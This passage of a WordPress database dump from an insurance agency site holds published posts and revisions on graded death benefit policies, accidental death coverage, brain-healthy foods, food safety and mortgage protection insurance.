a medical exam or health application required?\r\n\r\nLife insurance providers may require you to provide evidence of insurability prior to issuing you coverage. Evidence of insurability may involve you undergoing a medical exam or answering a health questionnaire.\r\n\r\nThis is not a comprehensive list of requirements that may be involved in purchasing life insurance.\r\n<h3>What is a graded death benefit whole life insurance policy?</h3>\r\nA graded death benefit whole life insurance policy is a type of whole life insurance. It may provide people not approved for standard life insurance an option to purchase life insurance.\r\n\r\nWhy? A medical exam is usually not required for a graded death benefit whole life insurance policy. As such, it may be an attractive option for people who have been declined for coverage due to personal health or other reasons like heart conditions, cancer, or even stroke.\r\n<h3>How does a graded death benefit whole life insurance policy work?</h3>\r\nA graded death benefit whole life insurance policy often works like a normal whole life insurance policy, except it usually has a waiting period, typically two to three years, before it will pay the full amount of death benefits. In the event your death occurs during the waiting period, a graded death benefit whole life insurance policy may pay a lower amount to your beneficiaries.\r\n\r\nWhat might you consider before purchasing a graded death benefit whole life insurance policy?\r\n\r\nYou may want to consider the following before purchasing a graded death benefit whole life insurance policy:\r\n<ol>\r\n 	<li><strong>Consider your health.</strong>\r\nA graded death benefit whole life insurance policy may offer those with significant risk factors a way to get life insurance. It may also be an appropriate option for you if you consider undergoing a health exam or a more exhaustive health screening a hassle.</li>\r\n 	<li><strong>Consider whether or not you want a type of whole life insurance policy.</strong>\r\nA graded death benefit policy is a type of whole life insurance. It provides coverage for the life of the insured, unlike term life insurance policies that expire after a certain time period.</li>\r\n 	<li><strong>Consider the waiting period and associated premiums.</strong>\r\nPremiums usually do not increase year-to-year for a graded death benefit whole life insurance policy. After the waiting period, the policy’s benefits will increase to the face value—the full insurance coverage amount—of the policy.</li>\r\n</ol>\r\nThis is not a comprehensive list of factors you may want to consider before purchasing a graded death benefit whole life insurance policy.\r\n<h3>A graded death benefit whole life insurance policy may be a helpful insurance coverage option for you.</h3>\r\nA graded death whole life insurance policy may be a helpful insurance coverage option for you. It may be able to help provide you with financial protection if you would not otherwise qualify for life insurance due to a pre-existing or chronic health condition or illness. A graded death benefit whole life insurance policy may require a waiting period to pass before paying out on the policy.\r\n\r\nContact a licensed insurance professional to find out more about graded death benefit whole life insurance policies and to discuss your insurance needs.','How Does a Graded Death Benefit Whole Life Insurance Policy Work?','','inherit','closed','closed','','57-revision-v1','','','2023-03-01 13:45:55','2023-03-01 13:45:55','',57,'http://cmdev-site1.com/?p=60',0,'revision','',0),(61,1,'2023-03-01 13:53:31','2023-03-01 13:53:31','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\nWhen many of us think of our passing, we imagine it will be something that doesn’t happen until well into our old age. But what happens if the unthinkable happens and your life is taken in an accident?\r\n\r\nAccording to the CDC, each year, there are more than 170,000 deaths attributed to unintentional injuries, including motor vehicle accidents.<sup>1</sup>\r\n<h3>Simply put: Accidents happen.</h3>\r\nSo, are you and your loved ones prepared in the event of a fatal accident? In this article, we’ll explore some ways you can shore up your life insurance protection to help benefit your loved ones in the event of your untimely (and accidental) passing.\r\n<h3>What is accidental death insurance?</h3>\r\nAccidental death insurance is often a clause or rider connected to a life insurance policy. It provides additional benefits to beneficiaries in the event the insured passes away under the coverage period from a covered accident. The insured often pays an additional premium if this rider is added to their existing policy.\r\n<h3>What is considered an “accidental death”?</h3>\r\nAccidental deaths, in the eyes of many insurance companies, are those that occur as the result of an incident that’s caused by forces outside of your control.\r\n\r\nThink of car crashes, slips and falls, choking, drowning, machine accidents, and other situations that cannot be controlled and are deemed by the insurance company to be an accident.\r\n\r\nIncidences of an accidental death that stem from a hazardous activity, such as race car driving, base jumping, or sky diving, often aren’t covered under accidental death coverage. This is subject to the insurance company’s specific policy terms. Death from an illness is excluded. Deaths stemming from illegal activities can be excluded as well.\r\n<h3>Why might you want to consider accidental death coverage?</h3>\r\nAdding additional coverage to an existing life insurance policy can be a helpful benefit for your loved ones and beneficiaries. They can be even better protected in the event of your sudden, unforeseen passing.\r\n\r\nThe addition of accidental death coverage to your existing life insurance policy can provide extra help for your family in their time of need if they were to lose you to an accident.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em>Sources:</em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.cdc.gov/nchs/fastats/accidental-injury.htm\" target=\"_blank\" rel=\"noopener noreferrer\">CDC, Accidents or Unintentional Injuries</a>, 2021</span></em>','Do I need Accidental Death Insurance?','','publish','open','open','','do-i-need-accidental-death-insurance','','','2023-03-19 17:38:34','2023-03-19 17:38:34','',0,'http://cmdev-site1.com/?p=61',0,'post','',0),(62,1,'2023-03-01 13:51:40','2023-03-01 13:51:40','Accidental Death Benefit And Dismemberment & insurance.','Accidental Death Benefit And Dismemberment ad&amp;d insurance.','','inherit','open','closed','','accidental-death-benefit-and-dismemberment-add-insurance','','','2023-03-01 13:52:20','2023-03-01 13:52:20','',61,'http://cmdev-site1.com/wp-content/uploads/2023/03/Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1.jpg',0,'attachment','image/jpeg',0),(63,1,'2023-03-01 13:53:31','2023-03-01 13:53:31','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams • May 25, 2021</span></div>\r\nWhen many of us think of our passing, we imagine it will be something that doesn’t happen until well into our old age. But what happens if the unthinkable happens and your life is taken in an accident? According to the CDC, each year, there are more than 170,000 deaths attributed to unintentional injuries, including motor vehicle accidents.<sup>1</sup>\r\n<h3>Simply put: Accidents happen.</h3>\r\nSo, are you and your loved ones prepared in the event of a fatal accident? In this article, we’ll explore some ways you can shore up your life insurance protection to help benefit your loved ones in the event of your untimely (and accidental) passing.\r\n<h3>What is accidental death insurance?</h3>\r\nAccidental death insurance is often a clause or rider connected to a life insurance policy. It provides additional benefits to beneficiaries in the event the insured passes away under the coverage period from a covered accident. The insured often pays an additional premium if this rider is added to their existing policy.\r\n<h3>What is considered an “accidental death”?</h3>\r\nAccidental deaths, in the eyes of many insurance companies, are those that occur as the result of an incident that’s caused by forces outside of your control.\r\n\r\nThink of car crashes, slips and falls, choking, drowning, machine accidents, and other situations that cannot be controlled and are deemed by the insurance company to be an accident.\r\n\r\nIncidences of an accidental death that stem from a hazardous activity, such as race car driving, base jumping, or sky diving, often aren’t covered under accidental death coverage. This is subject to the insurance company’s specific policy terms. Death from an illness is excluded. Deaths stemming from illegal activities can be excluded as well.\r\n<h3>Why might you want to consider accidental death coverage?</h3>\r\nAdding additional coverage to an existing life insurance policy can be a helpful benefit for your loved ones and beneficiaries. They can be even better protected in the event of your sudden, unforeseen passing. The addition of accidental death coverage to your existing life insurance policy can provide extra help for your family in their time of need if they were to lose you to an accident.\r\n<h5><span style=\"font-size: 10pt;\">Sources:</span></h5>\r\n<div><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.cdc.gov/nchs/fastats/accidental-injury.htm\" target=\"_blank\" rel=\"noopener noreferrer\">CDC, Accidents or Unintentional Injuries</a>, 2021</span></em></div>','Do I need Accidental Death Insurance?','','inherit','closed','closed','','61-revision-v1','','','2023-03-01 13:53:31','2023-03-01 13:53:31','',61,'http://cmdev-site1.com/?p=63',0,'revision','',0),(65,1,'2023-03-01 14:04:07','2023-03-01 14:04:07','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\r\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\r\n<p style=\"padding-left: 40px;\"><strong>1. Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information.</p>\r\n<p style=\"padding-left: 40px;\">In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination.</p>\r\n<p style=\"padding-left: 40px;\">Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</p>\r\n<p style=\"padding-left: 40px;\"><strong>2. Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition.</p>\r\n<p style=\"padding-left: 40px;\">In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.</p>\r\n<p style=\"padding-left: 40px;\">A study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</p>\r\n<p style=\"padding-left: 40px;\"><strong>3. Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.</p>\r\n<p style=\"padding-left: 40px;\">A 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</p>\r\n<p style=\"padding-left: 40px;\"><strong>4. Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline.</p>\r\n<p style=\"padding-left: 40px;\">Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</p>\r\n<p style=\"padding-left: 40px;\"><strong>5. Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing.</p>\r\n<p style=\"padding-left: 40px;\">Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease. Research has also shown that tea can work as a protective agent for the brain.</p>\r\n<p style=\"padding-left: 40px;\">According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</p>\r\n<p style=\"padding-left: 40px;\"><strong>6. Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E.</p>\r\n<p style=\"padding-left: 40px;\">According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.</p>\r\n<p style=\"padding-left: 40px;\">Lastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</p>\r\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','6 Foods That Feed Your Brain','','publish','open','open','','6-foods-that-feed-your-brain','','','2023-03-19 17:39:28','2023-03-19 17:39:28','',0,'http://cmdev-site1.com/?p=65',0,'post','',0),(66,1,'2023-03-01 14:02:48','2023-03-01 14:02:48','Blueberries and strawberries background. Top view.','Blueberries and strawberries background.','','inherit','open','closed','','blueberries-and-strawberries-background','','','2023-03-01 14:03:12','2023-03-01 14:03:12','',65,'http://cmdev-site1.com/wp-content/uploads/2023/03/Blueberries-and-strawberries-background-1000x667-1.jpg',0,'attachment','image/jpeg',0),(67,1,'2023-03-01 14:04:07','2023-03-01 14:04:07','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\r\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\r\n<ol>\r\n 	<li><strong>Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information. In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination. Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</li>\r\n 	<li><strong>Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition. In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.\r\n\r\nA study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</li>\r\n 	<li><strong>Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.\r\n\r\nA 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</li>\r\n 	<li><strong>Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline. Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</li>\r\n 	<li><strong>Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing. Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease.\r\n\r\nResearch has also shown that tea can work as a protective agent for the brain. According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</li>\r\n 	<li><strong>Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E. According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.\r\n\r\nLastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</li>\r\n</ol>\r\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.','6 Foods That Feed Your Brain','','inherit','closed','closed','','65-revision-v1','','','2023-03-01 14:04:07','2023-03-01 14:04:07','',65,'http://cmdev-site1.com/?p=67',0,'revision','',0),(68,1,'2023-03-01 14:10:17','2023-03-01 14:10:17','<div class=\"article_info\"><span style=\"font-size: 10pt;\">By Lucille Reed</span></div>\r\n<div></div>\r\n<div class=\"article_info\">As the weather warms up and families eat more of their meals outdoors, it’s easy for a potentially hazardous scenario to become a reality: food contamination. According to the CDC, foodborne illness is a common public health issue.</div>\r\n<div></div>\r\n<div class=\"article_info\">Estimates are that one in six Americans get sick from contaminated foods or beverages each year. Three thousand Americans die from such illnesses every year.<sup>1</sup></div>\r\n<div></div>\r\n<div class=\"article_info\">So what is food contamination, why is it potentially hazardous, and what are the ways people can practice safe food handling and preparation?</div>\r\n&nbsp;\r\n<h3>What are food contamination and food poisoning?</h3>\r\nFood contamination occurs when food is tainted with bacteria, mold, or other toxins at some point along the food production chain.<sup>2</sup> This can result in food poisoning when the food is ingested. Generally, the symptoms of food poisoning are similar to the stomach flu: nausea, vomiting, and other highly uncomfortable GI issues.<sup>3</sup>\r\n\r\nSometimes contaminated food can be easily identified, such as visibly moldy bread or smelly, rotten eggs. Other times, the bacteria, mold, or other contaminants cannot be seen by the naked eye.\r\n<h3>When food poisoning gets serious</h3>\r\nNo one likes to be sick. While many cases of food poisoning get better with time, there is a real risk of potential complications—especially dehydration and other serious health complications. Depending upon the contaminant, medical intervention may be necessary to help alleviate the symptoms or complications of food poisoning.<sup>3</sup> Contact your healthcare provider if you feel you need to be seen.\r\n<h3>Preventing foodborne illness</h3>\r\nPrevention is critical when it comes to food poisoning. Make sure you practice safe food preparation, storage, and serving protocols each time you prepare food for others—and for yourself. Keep foods at appropriate temperatures, and don’t let food sit out for extended periods of time.<sup>4</sup>\r\n\r\nExamine your food before ingesting it, especially canned and fresh fruit and veggies, to make sure the packaging is intact. Never eat food in which the packaging is cracked, has loose lids, or looks swollen. Practice good handwashing and hygiene when preparing foods, especially raw meats. Do not prepare foods if you are sick, especially with stomach-related illnesses.<sup>4</sup>\r\n\r\nFood contamination is a serious issue that impacts many Americans each year. Ensure you follow proper food handling practices to keep everyone at your outdoor meal safe.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. CDC, CDC’s Role in Food Safety, 2020, <a href=\"https://www.cdc.gov/foodsafety/cdc-and-food-safety.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/cdc-and-food-safety.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. CDC, How Food Gets Contaminated, 2017, <a href=\"https://www.cdc.gov/foodsafety/production-chain.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/production-chain.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NIDDK, Treatment for Food Poisoning, 2019, <a href=\"https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. CDC, Foods That Can Cause Food Poisoning, 2020, <a href=\"https://www.cdc.gov/foodsafety/foods-linked-illness.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/foods-linked-illness.html</a></span></em>','Food Contamination: Ways To Avoid The Potential Dangers And Keep Food Safe','','publish','open','open','','food-contamination-ways-to-avoid-the-potential-dangers-and-keep-food-safe','','','2023-03-19 17:40:35','2023-03-19 17:40:35','',0,'http://cmdev-site1.com/?p=68',0,'post','',0),(69,1,'2023-03-01 14:08:50','2023-03-01 14:08:50','Senior woman checking expiration date on food product','Senior woman checking expiration date on food product','','inherit','open','closed','','senior-woman-checking-expiration-date-on-food-product','','','2023-03-01 14:09:19','2023-03-01 14:09:19','',68,'http://cmdev-site1.com/wp-content/uploads/2023/03/Woman-looking-at-expiration-date-on-food-1000x667-1.jpg',0,'attachment','image/jpeg',0),(70,1,'2023-03-01 14:10:17','2023-03-01 14:10:17','<div class=\"article_info\">By Lucille Reed • March 31, 2021</div>\r\n<div></div>\r\n<div class=\"article_info\">As the weather warms up and families eat more of their meals outdoors, it’s easy for a potentially hazardous scenario to become a reality: food contamination. According to the CDC, foodborne illness is a common public health issue.</div>\r\n<div></div>\r\n<div class=\"article_info\">Estimates are that one in six Americans get sick from contaminated foods or beverages each year. Three thousand Americans die from such illnesses every year.<sup>1</sup></div>\r\n<div></div>\r\n<div class=\"article_info\">So what is food contamination, why is it potentially hazardous, and what are the ways people can practice safe food handling and preparation?</div>\r\n&nbsp;\r\n<h3>What are food contamination and food poisoning?</h3>\r\nFood contamination occurs when food is tainted with bacteria, mold, or other toxins at some point along the food production chain.<sup>2</sup> This can result in food poisoning when the food is ingested. Generally, the symptoms of food poisoning are similar to the stomach flu: nausea, vomiting, and other highly uncomfortable GI issues.<sup>3</sup>\r\n\r\nSometimes contaminated food can be easily identified, such as visibly moldy bread or smelly, rotten eggs. Other times, the bacteria, mold, or other contaminants cannot be seen by the naked eye.\r\n<h3>When food poisoning gets serious</h3>\r\nNo one likes to be sick. While many cases of food poisoning get better with time, there is a real risk of potential complications—especially dehydration and other serious health complications. Depending upon the contaminant, medical intervention may be necessary to help alleviate the symptoms or complications of food poisoning.<sup>3</sup> Contact your healthcare provider if you feel you need to be seen.\r\n<h3>Preventing foodborne illness</h3>\r\nPrevention is critical when it comes to food poisoning. Make sure you practice safe food preparation, storage, and serving protocols each time you prepare food for others—and for yourself. Keep foods at appropriate temperatures, and don’t let food sit out for extended periods of time.<sup>4</sup>\r\n\r\nExamine your food before ingesting it, especially canned and fresh fruit and veggies, to make sure the packaging is intact. Never eat food in which the packaging is cracked, has loose lids, or looks swollen. Practice good handwashing and hygiene when preparing foods, especially raw meats. Do not prepare foods if you are sick, especially with stomach-related illnesses.<sup>4</sup>\r\n\r\nFood contamination is a serious issue that impacts many Americans each year. Ensure you follow proper food handling practices to keep everyone at your outdoor meal safe.\r\n<h5><span style=\"font-size: 10pt;\">Sources:\r\n</span><em><span style=\"font-size: 8pt;\">1. CDC, CDC’s Role in Food Safety, 2020, <a href=\"https://www.cdc.gov/foodsafety/cdc-and-food-safety.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/cdc-and-food-safety.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. CDC, How Food Gets Contaminated, 2017, <a href=\"https://www.cdc.gov/foodsafety/production-chain.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/production-chain.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NIDDK, Treatment for Food Poisoning, 2019, <a href=\"https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.niddk.nih.gov/health-information/digestive-diseases/food-poisoning/treatment</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. CDC, Foods That Can Cause Food Poisoning, 2020, <a href=\"https://www.cdc.gov/foodsafety/foods-linked-illness.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.cdc.gov/foodsafety/foods-linked-illness.html</a></span></em></h5>','Food Contamination: Ways To Avoid The Potential Dangers And Keep Food Safe','','inherit','closed','closed','','68-revision-v1','','','2023-03-01 14:10:17','2023-03-01 14:10:17','',68,'http://cmdev-site1.com/?p=70',0,'revision','',0),(71,1,'2023-03-01 14:17:24','2023-03-01 14:17:24','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div></div>\r\n<div class=\"article_info\">When you purchase a home, you’ll most likely have a mortgage along with it. Mortgages usually last about 30 years (though there are shorter options), which leaves you responsible for a monthly payment for a long period of time.<sup>1</sup></div>\r\n&nbsp;\r\n<h3>Life Insurance When You Have a Mortgage</h3>\r\nWhen making preparations for the future, people often purchase life insurance to help protect their loved ones in the event of their passing. When someone has a mortgage, a specific type of insurance they may consider is Mortgage Protection Insurance. This type of insurance is purchased to pay off the balance of a mortgage in case the insured dies, primarily so their family can stay in the home.\r\n<h3>How Mortgage Protection Insurance Works</h3>\r\nUnlike traditional life insurance, which has a constant benefit amount, Mortgage Protection Insurance has a benefit that usually decreases as the mortgage balance goes down over time. The premium amount typically remains constant.<sup>2</sup>\r\n\r\nInstead of the benefit going to a traditional beneficiary (like a spouse or other loved one), the benefit usually goes to the mortgage lender specifically to pay off the remainder of the mortgage.\r\n<h3>MPI vs. PMI</h3>\r\nMortgage Protection Insurance (MPI) is a voluntary insurance that the insured may choose to purchase to pay the lender in case they die before the mortgage is paid off. MPI should not be confused with Private Mortgage Insurance (PMI), which is not voluntary.\r\n\r\nWhen you take out a conventional mortgage loan without putting down 20 percent, some lenders might require you to get PMI. This pays the lender if you stop making payments and is not designed to protect you.<sup>2</sup>\r\n<h3>Key Takeaway</h3>\r\nMortgage Protection Insurance usually has a decreasing benefit amount that decreases as the mortgage balance goes down. The benefit goes to the mortgage lender.\r\n\r\nIf you want to know if Mortgage Protection Insurance is right for you, contact a financial advisor. If you want to know more about Mortgage Protection Insurance, contact a licensed insurance agent.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 10pt;\"><em><span style=\"font-size: 8pt;\">Sources:</span></em>\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.marketplace.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Marketplace</a>, “Why do we have a 30-year mortgage, anyway?” 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.forbes.com/\" target=\"_blank\" rel=\"noopener noreferrer\">Forbes</a>, “The Keys to Mortgage Life Insurance” 2020</span></em>','What Is Mortgage Protection Insurance?','','publish','open','open','','what-is-mortgage-protection-insurance','','','2023-03-19 17:41:35','2023-03-19 17:41:35','',0,'http://cmdev-site1.com/?p=71',0,'post','',0),(72,1,'2023-03-01 14:16:37','2023-03-01 14:16:37','Happy multiethnic family sitting on sofa laughing together. Cheerful parents playing with their sons at home. Black father tickles his little boy while the mother and the brother smile.','Family having fun at home','','inherit','open','closed','','family-having-fun-at-home','','','2023-03-01 14:16:53','2023-03-01 14:16:53','',71,'http://cmdev-site1.com/wp-content/uploads/2023/03/Family-having-fun-at-home-1000x664-1.jpg',0,'attachment','image/jpeg',0),(73,1,'2023-03-01 14:17:24','2023-03-01 14:17:24','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div></div>\r\n<div class=\"article_info\">When you purchase a home, you’ll most likely have a mortgage along with it. Mortgages usually last about 30 years (though there are shorter options), which leaves you responsible for a monthly payment for a long period of time.<sup>1</sup></div>\r\n&nbsp;\r\n<h3>Life Insurance When You Have a Mortgage</h3>\r\nWhen making preparations for the future, people often purchase life insurance to help protect their loved ones in the event of their passing. When someone has a mortgage, a specific type of insurance they may consider is Mortgage Protection Insurance. This type of insurance is purchased to pay off the balance of a mortgage in case the insured dies, primarily so their family can stay in the home.\r\n<h3>How Mortgage Protection Insurance Works</h3>\r\nUnlike traditional life insurance, which has a constant benefit amount, Mortgage Protection Insurance has a benefit that usually decreases as the mortgage balance goes down over time. The premium amount typically remains constant.<sup>2</sup>\r\n\r\nInstead of the benefit going to a traditional beneficiary (like a spouse or other loved one), the benefit usually goes to the mortgage lender specifically to pay off the remainder of the mortgage.\r\n<h3>MPI vs. PMI</h3>\r\nMortgage Protection Insurance (MPI) is a voluntary insurance that the insured may choose to purchase to pay the lender in case they die before the mortgage is paid off. MPI should not be confused with Private Mortgage Insurance (PMI), which is not voluntary.\r\n\r\nWhen you take out a conventional mortgage loan without putting down 20 percent, some lenders might require you to get PMI. This pays the lender if you stop making payments and is not designed to protect you.<sup>2</sup>\r\n<h3>Key Takeaway</h3>\r\nMortgage Protection Insurance usually has a decreasing benefit amount that decreases as the mortgage balance goes down. The benefit goes to the mortgage lender.\r\n\r\nIf you want to know if Mortgage Protection Insurance is right for you, contact a financial advisor. If you want to know more about Mortgage Protection Insurance, contact a licensed insurance agent.\r\n\r\n<span style=\"font-size: 10pt;\">Sources:</span>\r\n<div><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.marketplace.org/\" target=\"_blank\" rel=\"noopener noreferrer\">Marketplace</a>, “Why do we have a 30-year mortgage, anyway?” 2018</span></em>\r\n<em><span style=\"font-size: 8pt;\">2. <a href=\"https://www.forbes.com/\" target=\"_blank\" rel=\"noopener noreferrer\">Forbes</a>, “The Keys to Mortgage Life Insurance” 2020</span></em></div>','What Is Mortgage Protection Insurance?','','inherit','closed','closed','','71-revision-v1','','','2023-03-01 14:17:24','2023-03-01 14:17:24','',71,'http://cmdev-site1.com/?p=73',0,'revision','',0),(74,1,'2023-03-01 14:23:59','2023-03-01 14:23:59','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Many Americans believe life insurance to be a necessity and include life insurance as part of their regular financial planning. With its ability to fill a variety of needs, like providing supplemental income or helping pay for college, life insurance can help young families provide continued financial security to their loved ones.</div>\r\n<div></div>\r\n<div class=\"article_info\">For this reason, it’s no surprise that many Americans believe that life insurance can be the most important purchase they make. But do young American families really need to consider purchasing life insurance so soon?</div>\r\n&nbsp;\r\n<h3>Why Young Families Should Consider Life Insurance</h3>\r\nLife insurance may be the most important purchase you make in your family. Why? Because it could help contribute to your family’s continued financial stability, security, and lifestyle in the event that something should happen to you or your spouse.\r\n\r\nAsk yourself, what would happen if you or your partner should die unexpectedly? How would bills get paid? Could your family’s financial security and well-being be put in jeopardy? Will your family be able to continue living in their home without your financial support?\r\n\r\nIf asking yourself these questions made you pause with uncertainty, it may be time to consider purchasing life insurance.\r\n<h3>What Young Families Should Know Before Selecting a Life Insurance Policy</h3>\r\nNow that you know you may need a life insurance policy, what type of policy should you consider purchasing? There are a few types of life insurance policies young families can choose from, with the most common options being term and whole life insurance.\r\n\r\nTerm life insurance and whole life insurance 